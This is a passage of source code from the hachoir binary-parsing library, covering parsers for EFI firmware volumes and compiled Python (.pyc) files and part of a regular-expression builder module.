if self["have_language_preference"].value:
yield VbeString(self, "language_preference")
if self["have_comment"].value:
yield VbeString(self, "comment")
if self["have_created_by"].value:
yield VbeString(self, "created_by")
yield TagStringList(self, "poi_tags")
yield TagStringList(self, "way_tags")
yield UInt8(self, "num_zoom_intervals")
for i in range(self["num_zoom_intervals"].value):
yield ZoomIntervalCfg(self, "zoom_interval_cfg[]")
for i in range(self["num_zoom_intervals"].value):
zoomIntervalCfg = self["zoom_interval_cfg[%d]" % i]
self.seekByte(zoomIntervalCfg[
"subfile_start"].value, relative=False)
yield ZoomSubFile(self, "subfile[]", size=zoomIntervalCfg["subfile_size"].value * 8, zoomIntervalCfg=zoomIntervalCfg)
```
#### File: parser/misc/pifv.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
UInt8, UInt16, UInt24, UInt32, UInt64, Enum,
CString, String, PaddingBytes, RawBytes, NullBytes)
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.tools import paddingSize, humanFilesize
from hachoir.parser.common.win32 import GUID
EFI_SECTION_COMPRESSION = 0x1
EFI_SECTION_GUID_DEFINED = 0x2
EFI_SECTION_PE32 = 0x10
EFI_SECTION_PIC = 0x11
EFI_SECTION_TE = 0x12
EFI_SECTION_DXE_DEPEX = 0x13
EFI_SECTION_VERSION = 0x14
EFI_SECTION_USER_INTERFACE = 0x15
EFI_SECTION_COMPATIBILITY16 = 0x16
EFI_SECTION_FIRMWARE_VOLUME_IMAGE = 0x17
EFI_SECTION_FREEFORM_SUBTYPE_GUID = 0x18
EFI_SECTION_RAW = 0x19
EFI_SECTION_PEI_DEPEX = 0x1b
EFI_SECTION_TYPE = {
EFI_SECTION_COMPRESSION: "Encapsulation section where other sections"
+ " are compressed",
EFI_SECTION_GUID_DEFINED: "Encapsulation section where other sections"
+ " have format defined by a GUID",
EFI_SECTION_PE32: "PE32+ Executable image",
EFI_SECTION_PIC: "Position-Independent Code",
EFI_SECTION_TE: "Terse Executable image",
EFI_SECTION_DXE_DEPEX: "DXE Dependency Expression",
EFI_SECTION_VERSION: "Version, Text and Numeric",
EFI_SECTION_USER_INTERFACE: "User-Friendly name of the driver",
EFI_SECTION_COMPATIBILITY16: "DOS-style 16-bit EXE",
EFI_SECTION_FIRMWARE_VOLUME_IMAGE: "PI Firmware Volume image",
EFI_SECTION_FREEFORM_SUBTYPE_GUID: "Raw data with GUID in header to"
+ " define format",
EFI_SECTION_RAW: "Raw data",
EFI_SECTION_PEI_DEPEX: "PEI Dependency Expression",
}
EFI_FV_FILETYPE_RAW = 0x1
EFI_FV_FILETYPE_FREEFORM = 0x2
EFI_FV_FILETYPE_SECURITY_CORE = 0x3
EFI_FV_FILETYPE_PEI_CORE = 0x4
EFI_FV_FILETYPE_DXE_CORE = 0x5
EFI_FV_FILETYPE_PEIM = 0x6
EFI_FV_FILETYPE_DRIVER = 0x7
EFI_FV_FILETYPE_COMBINED_PEIM_DRIVER = 0x8
EFI_FV_FILETYPE_APPLICATION = 0x9
EFI_FV_FILETYPE_FIRMWARE_VOLUME_IMAGE = 0xb
EFI_FV_FILETYPE_FFS_PAD = 0xf0
EFI_FV_FILETYPE = {
EFI_FV_FILETYPE_RAW: "Binary data",
EFI_FV_FILETYPE_FREEFORM: "Sectioned data",
EFI_FV_FILETYPE_SECURITY_CORE: "Platform core code used during the SEC"
+ " phase",
EFI_FV_FILETYPE_PEI_CORE: "PEI Foundation",
EFI_FV_FILETYPE_DXE_CORE: "DXE Foundation",
EFI_FV_FILETYPE_PEIM: "PEI module (PEIM)",
EFI_FV_FILETYPE_DRIVER: "DXE driver",
EFI_FV_FILETYPE_COMBINED_PEIM_DRIVER: "Combined PEIM/DXE driver",
EFI_FV_FILETYPE_APPLICATION: "Application",
EFI_FV_FILETYPE_FIRMWARE_VOLUME_IMAGE: "Firmware volume image",
EFI_FV_FILETYPE_FFS_PAD: "Pad File For FFS",
}
for x in range(0xc0, 0xe0):
EFI_FV_FILETYPE[x] = "OEM File"
for x in range(0xe0, 0xf0):
EFI_FV_FILETYPE[x] = "Debug/Test File"
for x in range(0xf1, 0x100):
EFI_FV_FILETYPE[x] = "Firmware File System Specific File"
class BlockMap(FieldSet):
static_size = 8 * 8
def createFields(self):
yield UInt32(self, "num_blocks")
yield UInt32(self, "len")
def createDescription(self):
return "%d blocks of %s" % (
self["num_blocks"].value, humanFilesize(self["len"].value))
class FileSection(FieldSet):
COMPRESSION_TYPE = {
0: 'Not Compressed',
1: 'Standard Compression',
}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
self._size = self["size"].value * 8
section_type = self["type"].value
if section_type in (EFI_SECTION_DXE_DEPEX, EFI_SECTION_PEI_DEPEX):
# These sections can sometimes be longer than what their size
# claims! It's so nice to have so detailled specs and not follow
# them ...
if self.stream.readBytes(self.absolute_address +
self._size, 1) == b'\0':
self._size = self._size + 16
def createFields(self):
# Header
yield UInt24(self, "size")
yield Enum(UInt8(self, "type"), EFI_SECTION_TYPE)
section_type = self["type"].value
if section_type == EFI_SECTION_COMPRESSION:
yield UInt32(self, "uncomp_len")
yield Enum(UInt8(self, "comp_type"), self.COMPRESSION_TYPE)
elif section_type == EFI_SECTION_FREEFORM_SUBTYPE_GUID:
yield GUID(self, "sub_type_guid")
elif section_type == EFI_SECTION_GUID_DEFINED:
yield GUID(self, "section_definition_guid")
yield UInt16(self, "data_offset")
yield UInt16(self, "attributes")
elif section_type == EFI_SECTION_USER_INTERFACE:
yield CString(self, "file_name", charset="UTF-16-LE")
elif section_type == EFI_SECTION_VERSION:
yield UInt16(self, "build_number")
yield CString(self, "version", charset="UTF-16-LE")
# Content
content_size = (self.size - self.current_size) // 8
if content_size == 0:
return
if section_type == EFI_SECTION_COMPRESSION:
compression_type = self["comp_type"].value
if compression_type == 1:
while not self.eof:
yield RawBytes(self, "compressed_content", content_size)
else:
while not self.eof:
yield FileSection(self, "section[]")
elif section_type == EFI_SECTION_FIRMWARE_VOLUME_IMAGE:
yield FirmwareVolume(self, "firmware_volume")
else:
yield RawBytes(self, "content", content_size,
EFI_SECTION_TYPE.get(self["type"].value,
"Unknown Section Type"))
def createDescription(self):
return EFI_SECTION_TYPE.get(self["type"].value,
"Unknown Section Type")
class File(FieldSet):
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
self._size = self["size"].value * 8
def createFields(self):
# Header
yield GUID(self, "name")
yield UInt16(self, "integrity_check")
yield Enum(UInt8(self, "type"), EFI_FV_FILETYPE)
yield UInt8(self, "attributes")
yield UInt24(self, "size")
yield UInt8(self, "state")
# Content
while not self.eof:
yield FileSection(self, "section[]")
def createDescription(self):
return "%s: %s containing %d section(s)" % (
self["name"].value,
self["type"].display,
len(self.array("section")))
class FirmwareVolume(FieldSet):
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
if not self._size:
self._size = self["volume_len"].value * 8
def createFields(self):
# Header
yield NullBytes(self, "zero_vector", 16)
yield GUID(self, "fs_guid")
yield UInt64(self, "volume_len")
yield String(self, "signature", 4)
yield UInt32(self, "attributes")
yield UInt16(self, "header_len")
yield UInt16(self, "checksum")
yield UInt16(self, "ext_header_offset")
yield UInt8(self, "reserved")
yield UInt8(self, "revision")
while True:
bm = BlockMap(self, "block_map[]")
yield bm
if bm['num_blocks'].value == 0 and bm['len'].value == 0:
break
# TODO must handle extended header
# Content
while not self.eof:
padding = paddingSize(self.current_size // 8, 8)
if padding:
yield PaddingBytes(self, "padding[]", padding)
yield File(self, "file[]")
def createDescription(self):
return "Firmware Volume containing %d file(s)" % len(self.array("file"))
class PIFVFile(Parser):
endian = LITTLE_ENDIAN
MAGIC = b'_FVH'
PARSER_TAGS = {
"id": "pifv",
"category": "program",
"file_ext": ("bin", ""),
"min_size": 64 * 8, # smallest possible header
"magic_regex": ((b"\0{16}.{24}" + MAGIC, 0), ),
"description": "EFI Platform Initialization Firmware Volume",
}
def validate(self):
if self.stream.readBytes(40 * 8, 4) != self.MAGIC:
return "Invalid magic number"
if self.stream.readBytes(0, 16) != b"\0" * 16:
return "Invalid zero vector"
return True
def createFields(self):
while not self.eof:
yield FirmwareVolume(self, "firmware_volume[]")
```
#### File: parser/program/python.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet, UInt8,
UInt16, Int32, UInt32, Int64, ParserError, Float64,
Character, RawBytes, PascalString8, TimestampUnix32,
Bit, String)
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.bits import long2raw
from hachoir.core.text_handler import textHandler, hexadecimal
DISASSEMBLE = False
if DISASSEMBLE:
from dis import dis
def disassembleBytecode(field):
bytecode = field.value
dis(bytecode)
# --- String and string reference ---
def parseString(parent):
yield UInt32(parent, "length", "Length")
length = parent["length"].value
if parent.name == "lnotab":
bytecode_offset = 0
line_number = parent['../firstlineno'].value
for i in range(0, length, 2):
bc_off_delta = UInt8(parent, 'bytecode_offset_delta[]')
yield bc_off_delta
bytecode_offset += bc_off_delta.value
bc_off_delta._description = 'Bytecode Offset %i' % bytecode_offset
line_number_delta = UInt8(parent, 'line_number_delta[]')
yield line_number_delta
line_number += line_number_delta.value
line_number_delta._description = 'Line Number %i' % line_number
elif 0 < length:
yield RawBytes(parent, "text", length, "Content")
if DISASSEMBLE and parent.name == "compiled_code":
disassembleBytecode(parent["text"])
def parseStringRef(parent):
yield textHandler(UInt32(parent, "ref"), hexadecimal)
def createStringRefDesc(parent):
return "String ref: %s" % parent["ref"].display
# --- Integers ---
def parseInt32(parent):
yield Int32(parent, "value")
def parseInt64(parent):
yield Int64(parent, "value")
def parseLong(parent):
yield Int32(parent, "digit_count")
for index in range(abs(parent["digit_count"].value)):
yield UInt16(parent, "digit[]")
# --- Float and complex ---
def parseFloat(parent):
yield PascalString8(parent, "value")
def parseBinaryFloat(parent):
yield Float64(parent, "value")
def parseComplex(parent):
yield PascalString8(parent, "real")
yield PascalString8(parent, "complex")
def parseBinaryComplex(parent):
yield Float64(parent, "real")
yield Float64(parent, "complex")
# --- Tuple and list ---
def parseTuple(parent):
yield UInt32(parent, "count", "Item count")
count = parent["count"].value
if count < 0:
raise ParserError("Invalid tuple/list count")
for index in range(count):
yield Object(parent, "item[]")
def parseSmallTuple(parent):
yield UInt8(parent, "count", "Item count")
count = parent["count"].value
if count < 0:
raise ParserError("Invalid tuple/list count")
for index in range(count):
yield Object(parent, "item[]")
def createTupleDesc(parent):
count = parent["count"].value
items = "%s items" % count
return "%s: %s" % (parent.code_info[2], items)
# --- Dict ---
def parseDict(parent):
"""
Format is: (key1, value1, key2, value2, ..., keyn, valuen, NULL)
where each keyi and valuei is an object.
"""
parent.count = 0
while True:
key = Object(parent, "key[]")
yield key
if key["bytecode"].value == "0":
break
yield Object(parent, "value[]")
parent.count += 1
def createDictDesc(parent):
return "Dict: %s" % ("%s keys" % parent.count)
def parseRef(parent):
yield UInt32(parent, "n", "Reference")
def parseShortASCII(parent):
size = UInt8(parent, "len", "Number of ASCII characters")
yield size
yield String(parent, "text", size.value, "String content", charset="ASCII")
# --- Code ---
def parseCode(parent):
if 0x3000000 <= parent.root.getVersion():
yield UInt32(parent, "arg_count", "Argument count")
yield UInt32(parent, "kwonlyargcount", "Keyword only argument count")
yield UInt32(parent, "nb_locals", "Number of local variables")
yield UInt32(parent, "stack_size", "Stack size")
yield UInt32(parent, "flags")
elif 0x2030000 <= parent.root.getVersion():
yield UInt32(parent, "arg_count", "Argument count")
yield UInt32(parent, "nb_locals", "Number of local variables")
yield UInt32(parent, "stack_size", "Stack size")
yield UInt32(parent, "flags")
else:
yield UInt16(parent, "arg_count", "Argument count")
yield UInt16(parent, "nb_locals", "Number of local variables")
yield UInt16(parent, "stack_size", "Stack size")
yield UInt16(parent, "flags")
yield Object(parent, "compiled_code")
yield Object(parent, "consts")
yield Object(parent, "names")
yield Object(parent, "varnames")
if 0x2000000 <= parent.root.getVersion():
yield Object(parent, "freevars")
yield Object(parent, "cellvars")
yield Object(parent, "filename")
yield Object(parent, "name")
if 0x2030000 <= parent.root.getVersion():
yield UInt32(parent, "firstlineno", "First line number")
else:
yield UInt16(parent, "firstlineno", "First line number")
yield Object(parent, "lnotab")
class Object(FieldSet):
bytecode_info = {
# Don't contains any data
'0': ("null", None, "NULL", None),
'N': ("none", None, "None", None),
'F': ("false", None, "False", None),
'T': ("true", None, "True", None),
'S': ("stop_iter", None, "StopIter", None),
'.': ("ellipsis", None, "ELLIPSIS", None),
'?': ("unknown", None, "Unknown", None),
'i': ("int32", parseInt32, "Int32", None),
'I': ("int64", parseInt64, "Int64", None),
'f': ("float", parseFloat, "Float", None),
'g': ("bin_float", parseBinaryFloat, "Binary float", None),
'x': ("complex", parseComplex, "Complex", None),
'y': ("bin_complex", parseBinaryComplex, "Binary complex", None),
'l': ("long", parseLong, "Long", None),
's': ("string", parseString, "String", None),
't': ("interned", parseString, "Interned", None),
'u': ("unicode", parseString, "Unicode", None),
'R': ("string_ref", parseStringRef, "String ref", createStringRefDesc),
'(': ("tuple", parseTuple, "Tuple", createTupleDesc),
')': ("small_tuple", parseSmallTuple, "Tuple", createTupleDesc),
'[': ("list", parseTuple, "List", createTupleDesc),
'<': ("set", parseTuple, "Set", createTupleDesc),
'>': ("frozenset", parseTuple, "Frozen set", createTupleDesc),
'{': ("dict", parseDict, "Dict", createDictDesc),
'c': ("code", parseCode, "Code", None),
'r': ("ref", parseRef, "Reference", None),
'z': ("short_ascii", parseShortASCII, "Short ASCII", None),
'Z': ("short_ascii_interned", parseShortASCII, "Short ASCII interned", None),
}
def __init__(self, parent, name, **kw):
FieldSet.__init__(self, parent, name, **kw)
code = self["bytecode"].value
if code not in self.bytecode_info:
raise ParserError('Unknown bytecode %r at position %s'
% (code, self.absolute_address // 8))
self.code_info = self.bytecode_info[code]
if not name:
self._name = self.code_info[0]
if code == "l":
self.createValue = self.createValueLong
elif code in ("i", "I", "f", "g"):
self.createValue = lambda: self["value"].value
elif code == "T":
self.createValue = lambda: True
elif code == "F":
self.createValue = lambda: False
elif code in ("x", "y"):
self.createValue = self.createValueComplex
elif code in ("s", "t", "u"):
self.createValue = self.createValueString
self.createDisplay = self.createDisplayString
if code == 't':
if not hasattr(self.root, 'string_table'):
self.root.string_table = []
self.root.string_table.append(self)
elif code == 'R':
if hasattr(self.root, 'string_table'):
self.createValue = self.createValueStringRef
def createValueString(self):
if "text" in self:
return self["text"].value
else:
return ""
def createDisplayString(self):
if "text" in self:
return self["text"].display
else:
return "(empty)"
def createValueLong(self):
is_negative = self["digit_count"].value < 0
count = abs(self["digit_count"].value)
total = 0
for index in range(count - 1, -1, -1):
total <<= 15
total += self["digit[%u]" % index].value
if is_negative:
total = -total
return total
def createValueStringRef(self):
return self.root.string_table[self['ref'].value].value
def createDisplayStringRef(self):
return self.root.string_table[self['ref'].value].display
def createValueComplex(self):
return complex(
float(self["real"].value),
float(self["complex"].value))
def createFields(self):
yield BytecodeChar(self, "bytecode", "Bytecode")
yield Bit(self, "flag_ref", "Is a reference?")
parser = self.code_info[1]
if parser:
yield from parser(self)
def createDescription(self):
create = self.code_info[3]
if create:
return create(self)
else:
return self.code_info[2]
class BytecodeChar(Character):
static_size = 7
class PythonCompiledFile(Parser):
PARSER_TAGS = {
"id": "python",
"category": "program",
"file_ext": ("pyc", "pyo"),
"min_size": 9 * 8,
"description": "Compiled Python script (.pyc/.pyo files)"
}
endian = LITTLE_ENDIAN
# Dictionnary which associate the pyc signature (32-bit integer)
# to a Python version string (eg. "m\xf2\r\n" => "Python 2.4b1").
# This list comes from CPython source code, see MAGIC_NUMBER
# in file Lib/importlib/_bootstrap_external.py
MAGIC = {
# Python 1.x
20121: ("1.5", 0x1050000),
50428: ("1.6", 0x1060000),
# Python 2.x
50823: ("2.0", 0x2000000),
60202: ("2.1", 0x2010000),
60717: ("2.2", 0x2020000),
62011: ("2.3a0", 0x2030000),
62021: ("2.3a0", 0x2030000),
62041: ("2.4a0", 0x2040000),
62051: ("2.4a3", 0x2040000),
62061: ("2.4b1", 0x2040000),
62071: ("2.5a0", 0x2050000),
62081: ("2.5a0 (ast-branch)", 0x2050000),
62091: ("2.5a0 (with)", 0x2050000),
62092: ("2.5a0 (WITH_CLEANUP opcode)", 0x2050000),
62101: ("2.5b3", 0x2050000),
62111: ("2.5b3", 0x2050000),
62121: ("2.5c1", 0x2050000),
62131: ("2.5c2", 0x2050000),
62151: ("2.6a0", 0x2070000),
62161: ("2.6a1", 0x2070000),
62171: ("2.7a0", 0x2070000),
62181: ("2.7a0", 0x2070000),
62191: ("2.7a0", 0x2070000),
62201: ("2.7a0", 0x2070000),
62211: ("2.7a0", 0x2070000),
# Python 3.x
3000: ("3.0 (3000)", 0x3000000),
3010: ("3.0 (3010)", 0x3000000),
3020: ("3.0 (3020)", 0x3000000),
3030: ("3.0 (3030)", 0x3000000),
3040: ("3.0 (3040)", 0x3000000),
3050: ("3.0 (3050)", 0x3000000),
3060: ("3.0 (3060)", 0x3000000),
3061: ("3.0 (3061)", 0x3000000),
3071: ("3.0 (3071)", 0x3000000),
3081: ("3.0 (3081)", 0x3000000),
3091: ("3.0 (3091)", 0x3000000),
3101: ("3.0 (3101)", 0x3000000),
3103: ("3.0 (3103)", 0x3000000),
3111: ("3.0a4", 0x3000000),
3131: ("3.0a5", 0x3000000),
3141: ("3.1a0", 0x3010000),
3151: ("3.1a0", 0x3010000),
3160: ("3.2a0", 0x3020000),
3170: ("3.2a1", 0x3020000),
3180: ("3.2a2", 0x3020000),
3190: ("Python 3.3a0", 0x3030000),
3200: ("Python 3.3a0 ", 0x3030000),
3210: ("Python 3.3a0 ", 0x3030000),
3220: ("Python 3.3a1 ", 0x3030000),
3230: ("Python 3.3a4 ", 0x3030000),
3250: ("Python 3.4a1 ", 0x3040000),
3260: ("Python 3.4a1 ", 0x3040000),
3270: ("Python 3.4a1 ", 0x3040000),
3280: ("Python 3.4a1 ", 0x3040000),
3290: ("Python 3.4a4 ", 0x3040000),
3300: ("Python 3.4a4 ", 0x3040000),
3310: ("Python 3.4rc2", 0x3040000),
3320: ("Python 3.5a0 ", 0x3050000),
3330: ("Python 3.5b1 ", 0x3050000),
3340: ("Python 3.5b2 ", 0x3050000),
3350: ("Python 3.5b2 ", 0x3050000),
3351: ("Python 3.5.2 ", 0x3050000),
3360: ("Python 3.6a0 ", 0x3060000),
3361: ("Python 3.6a0 ", 0x3060000),
3370: ("Python 3.6a1 ", 0x3060000),
3371: ("Python 3.6a1 ", 0x3060000),
3372: ("Python 3.6a1 ", 0x3060000),
3373: ("Python 3.6b1 ", 0x3060000),
3375: ("Python 3.6b1 ", 0x3060000),
3376: ("Python 3.6b1 ", 0x3060000),
3377: ("Python 3.6b1 ", 0x3060000),
3378: ("Python 3.6b2 ", 0x3060000),
3379: ("Python 3.6rc1", 0x3060000),
3390: ("Python 3.7a0 ", 0x3070000),
}
# Dictionnary which associate the pyc signature (4-byte long string)
# to a Python version string (eg. "m\xf2\r\n" => "2.4b1")
STR_MAGIC = dict(
(long2raw(magic | (ord('\r') << 16) |
(ord('\n') << 24), LITTLE_ENDIAN), value[0])
for magic, value in MAGIC.items())
def validate(self):
magic_number = self["magic_number"].value
if magic_number not in self.MAGIC:
return "Unknown magic number (%s)" % magic_number
if self["magic_string"].value != "\r\n":
return r"Wrong magic string (\r\n)"
version = self.getVersion()
if version >= 0x3030000 and self['magic_number'].value >= 3200:
offset = 12
else:
offset = 8
value = self.stream.readBits(offset * 8, 7, self.endian)
if value != ord(b'c'):
return "First object bytecode is not code"
return True
def getVersion(self):
if not hasattr(self, "version"):
signature = self.stream.readBits(0, 16, self.endian)
self.version = self.MAGIC[signature][1]
return self.version
def createFields(self):
yield UInt16(self, "magic_number", "Magic number")
yield String(self, "magic_string", 2, r"Magic string \r\n", charset="ASCII")
yield TimestampUnix32(self, "timestamp", "Timestamp")
version = self.getVersion()
if version >= 0x3030000 and self['magic_number'].value >= 3200:
yield UInt32(self, "filesize", "Size of the Python source file (.py) modulo 2**32")
yield Object(self, "content")
```
#### File: hachoir/regex/regex.py
```python
import re
import operator
from hachoir.core.tools import makePrintable
def matchSingleValue(regex):
"""
Regex only match one exact string.
>>> matchSingleValue(RegexEmpty())
True
>>> matchSingleValue(createString("abc"))
True
>>> matchSingleValue(createRange("a", "b"))
False
>>> matchSingleValue(createRange("a"))
True
>>> matchSingleValue(RegexAnd((RegexStart(), createString("abc"))))
True
"""
cls = regex.__class__
if cls in (RegexEmpty, RegexString, RegexStart, RegexEnd):
return True
if cls == RegexAnd:
return all(matchSingleValue(item) for item in regex)
if cls == RegexRange:
return len(regex.ranges) == 1 and len(regex.ranges[0]) == 1
return False
def escapeRegex(text):
"""
Escape string to use it in a regular expression:
prefix special characters « ^.+*?{}[]|()\$ » by an antislash.
"""
return re.sub(r"([][^.+*?{}|()\\$])", r"\\\1", text)
def _join(func, regex_list):
if not isinstance(regex_list, (tuple, list)):
regex_list = list(regex_list)
if len(regex_list) == 0:
return RegexEmpty()
regex = regex_list[0]
for item in regex_list[1:]:
regex = func(regex, item)
return regex
def createString(text):
"""
>>> createString('')
<RegexEmpty ''>
>>> createString('abc')
<RegexString 'abc'>
"""
if text:
return RegexString(text)
else:
return RegexEmpty()
def createRange(*text, **kw):
"""
Create a regex range using character list.
>>> createRange("a", "d", "b")
<RegexRange '[abd]'>
>>> createRange("-", "9", "4", "3", "0")
<RegexRange '[0349-]'>
"""
ranges = (RegexRangeCharacter(item) for item in text)
return RegexRange(ranges, kw.get('exclude', False))
class Regex:
"""
Abstract class defining a regular expression atom
"""
def minLength(self):
"""
Maximum length in characters of the regex.
Returns None if there is no limit.
"""
raise NotImplementedError()
def maxLength(self):
"""
Maximum length in characters of the regex.
Returns None if there is no limit.
"""
return self.minLength()
def __str__(self, **kw):
if not hasattr(self, "_str_value"):
self._str_value = {}
key = kw.get('python', False)
if key not in self._str_value:
self._str_value[key] = self._str(**kw)
return self._str_value[key]
def _str(self, **kw):
raise NotImplementedError()
def __repr__(self, **kw):
regex = self.__str__(**kw)
regex = makePrintable(regex, 'ASCII')
return "<%s '%s'>" % (
self.__class__.__name__, regex)
def __contains__(self, item):
raise NotImplementedError()
def match(self, other):
"""
Guess if self may matchs regex.
May returns False even if self does match regex.
"""
if self == other:
return True
return self._match(other)
def _match(self, other):
"""
Does regex match other regex?
Eg. "." matchs "0" or "[a-z]" but "0" doesn't match ".".
This function is used by match() which already check regex identity.
"""
return False
def _and(self, regex):
"""
Create new optimized version of a+b.
Returns None if there is no interesting optimization.
"""
return None
def __and__(self, regex):
"""
Create new optimized version of a & b.
Returns None if there is no interesting optimization.
>>> RegexEmpty() & RegexString('a')
<RegexString 'a'>
"""
if regex.__class__ == RegexEmpty:
return self
new_regex = self._and(regex)
if new_regex:
return new_regex
else:
return RegexAnd((self, regex))
def __add__(self, regex):
return self.__and__(regex)
def or_(self, other):
"""
Create new optimized version of a|b.
Returns None if there is no interesting optimization.
"""
# (a|a) => a
if self == other:
return self
# a matchs b => a
if self._match(other):
return self
# b matchs a => b
if other._match(self):
return other
# Try to optimize (a|b)
if self.__class__ != other.__class__:
new_regex = self._or_(other, False)
if new_regex:
return new_regex
# Try to optimize (b|a)
new_regex = other._or_(self, True)
if new_regex:
return new_regex
return None
else:
return self._or_(other, False)
def _or_(self, other, reverse):
"""
Try to create optimized version of self|other if reverse if False,
or of other|self if reverse if True.
"""
return None
def __or__(self, other):
"""
Public method of OR operator: a|b. It call or_() internal method.
If or_() returns None: RegexOr object is used (and otherwise,
use or_() result).
"""
# Try to optimize (a|b)
new_regex = self.or_(other)
if new_regex:
return new_regex
# Else use (a|b)
return RegexOr((self, other))
def __eq__(self, regex):
if self.__class__ != regex.__class__:
return False
return self._eq(regex)
def _eq(self, other):
"""
Check if two objects of the same class are equals
"""
raise NotImplementedError(
"Class %s has no method _eq()" % self.__class__.__name__)
def compile(self, **kw):
return re.compile(self.__str__(**kw))
def findPrefix(self, regex):
"""
Try to create a common prefix between two regex.
Eg. "abc" and "abd" => "ab"
Return None if no prefix can be found.
"""
return None
def __iter__(self):
raise NotImplementedError()
class RegexEmpty(Regex):
def minLength(self):
return 0
def _str(self, **kw):
return ''
def _and(self, other):
return other
def _eq(self, other):
return True
class RegexWord(RegexEmpty):
def _and(self, other):
if other.__class__ == RegexWord:
return self
return None
def _str(self, **kw):
return r'\b'
class RegexStart(RegexEmpty):
def _and(self, other):
if other.__class__ == RegexStart:
return self
return None
def _str(self, **kw):
return '^'
class RegexEnd(RegexStart):
def _and(self, other):
if other.__class__ == RegexEnd:
return self
return None
def _str(self, **kw):
return '$'
class RegexDot(Regex):
def minLength(self):
return 1
def _str(self, **kw):
return '.'
def _match(self, other):
if other.__class__ == RegexRange:
return True
if other.__class__ == RegexString and len(other.text) == 1:
return True
return False
def _eq(self, other):
return True
class RegexString(Regex):
def __init__(self, text=""):
assert isinstance(text, str)
self.text = text
assert 1 <= len(self.text)
def minLength(self):
return len(self.text)
def _and(self, regex):
"""
>>> RegexString('a') + RegexString('b')
<RegexString 'ab'>
"""
if regex.__class__ == RegexString:
return RegexString(self.text + regex.text)
return None
def _str(self, **kw):
return escapeRegex(self.text)
def findPrefix(self, regex):
"""
Try to find a common prefix of two string regex, returns:
- None if there is no common prefix
- (prefix, regexa, regexb) otherwise => prefix + (regexa|regexb)
>>> RegexString('color red').findPrefix(RegexString('color blue'))
(<RegexString 'color '>, <RegexString 'red'>, <RegexString 'blue'>)
"""
if regex.__class__ != RegexString:
return None
texta = self.text
textb = regex.text
# '(a|b)' => '[ab]'
if len(texta) == len(textb) == 1:
return (createRange(texta, textb), RegexEmpty(), RegexEmpty())
# '(text abc|text def)' => 'text (abc|def)'
common = None
for length in range(1, min(len(texta), len(textb)) + 1):
if textb.startswith(texta[:length]):
common = length
else:
break
if not common:
return None
return (RegexString(texta[:common]), createString(texta[common:]), createString(textb[common:]))
def _or_(self, other, reverse):
"""
Remove duplicate:
>>> RegexString("color") | RegexString("color")
<RegexString 'color'>
Group prefix:
>>> RegexString("color red") | RegexString("color blue")
<RegexAnd 'color (red|blue)'>
>>> RegexString("color red") | RegexString("color")
<RegexAnd 'color( red|)'>
"""
# Don't know any other optimization for str|other
if other.__class__ != RegexString:
return None
# Find common prefix
common = self.findPrefix(other)
if common:
if not reverse:
regex = common[1] | common[2]
else:
regex = common[2] | common[1]
return common[0] + regex
return None
def _eq(self, other):
return self.text == other.text
class RegexRangeItem:
def __init__(self, cmin, cmax=None):
try:
self.cmin = cmin
if cmax is not None:
self.cmax = cmax
else:
self.cmax = cmin
except TypeError:
raise TypeError("RegexRangeItem: two characters expected (%s, %s) found" % (
type(cmin), type(cmax)))
if self.cmax < self.cmin:
raise TypeError("RegexRangeItem: minimum (%u) is bigger than maximum (%u)" %
(self.cmin, self.cmax))
def __len__(self):
return (self.cmax - self.cmin + 1)
def __contains__(self, value):
assert issubclass(value.__class__, RegexRangeItem)
return (self.cmin <= value.cmin) and (value.cmax <= self.cmax)
def __str__(self, **kw):
cmin = chr(self.cmin)
if self.cmin != self.cmax:
cmax = chr(self.cmax)
if (self.cmin + 1) == self.cmax:
return "%s%s" % (cmin, cmax)
else:
return "%s-%s" % (cmin, cmax)
else:
return cmin
def __repr__(self):
return "<RegexRangeItem %u-%u>" % (self.cmin, self.cmax)
class RegexRangeCharacter(RegexRangeItem):
def __init__(self, char):
RegexRangeItem.__init__(self, ord(char), ord(char))
class RegexRange(Regex):
def __init__(self, ranges, exclude=False, optimize=True):
if optimize:
self.ranges = []
for item in ranges:
RegexRange.rangeAdd(self.ranges, item)
self.ranges.sort(key=lambda item: item.cmin)
else:
self.ranges = tuple(ranges)
self.exclude = exclude
@staticmethod
def rangeAdd(ranges, itemb):
"""
Add a value in a RegexRangeItem() list:
remove duplicates and merge ranges when it's possible.
"""
new = None
for index, itema in enumerate(ranges):
if itema in itemb:
# [b] + [a-c] => [a-c]
new = itemb
break
elif itemb in itema:
# [a-c] + [b] => [a-c]
return
elif (itemb.cmax + 1) == itema.cmin:
# [d-f] + [a-c] => [a-f]
new = RegexRangeItem(itemb.cmin, itema.cmax)
break
elif (itema.cmax + 1) == itemb.cmin:
# [a-c] + [d-f] => [a-f]
new = RegexRangeItem(itema.cmin, itemb.cmax)
break
if new:
del ranges[index]
RegexRange.rangeAdd(ranges, new)
return
else:
ranges.append(itemb)
def minLength(self):
return 1
def _match(self, other):
"""
>>> createRange("a") | createRange("b")
<RegexRange '[ab]'>
>>> createRange("a", "b", exclude=True) | createRange("a", "c", exclude=True)
<RegexRange '[^a-c]'>
"""
if not self.exclude and other.__class__ == RegexString and len(other.text) == 1:
branges = (RegexRangeCharacter(other.text),)
elif other.__class__ == RegexRange and self.exclude == other.exclude:
branges = other.ranges
else:
return None
for itemb in branges:
if not any(itemb in itema for itema in self.ranges):
return False
return True
def _or_(self, other, reverse):
"""
>>> createRange("a") | createRange("b")
<RegexRange '[ab]'>
>>> createRange("a", "b", exclude=True) | createRange("a", "c", exclude=True)
<RegexRange '[^a-c]'>
"""
if not self.exclude and other.__class__ == RegexString and len(other.text) == 1:
branges = (RegexRangeCharacter(other.text),)
elif other.__class__ == RegexRange and self.exclude == other.exclude:
branges = other.ranges
else:
return None
ranges = list(self.ranges)
for itemb in branges:
RegexRange.rangeAdd(ranges, itemb)
return RegexRange(ranges, self.exclude, optimize=False)
def _str(self, **kw):
content = [str(item) for item in self.ranges]
if "-" in content:
content.remove("-")
suffix = "-"
else:
suffix = ""
if "]" in content:
content.remove("]")
prefix = "]"
else:
prefix = ""
text = prefix + (''.join(content)) + suffix
if self.exclude:
return "[^%s]" % text
else:
return "[%s]" % text
def _eq(self, other):
if self.exclude != other.exclude:
return False
return self.ranges == other.ranges
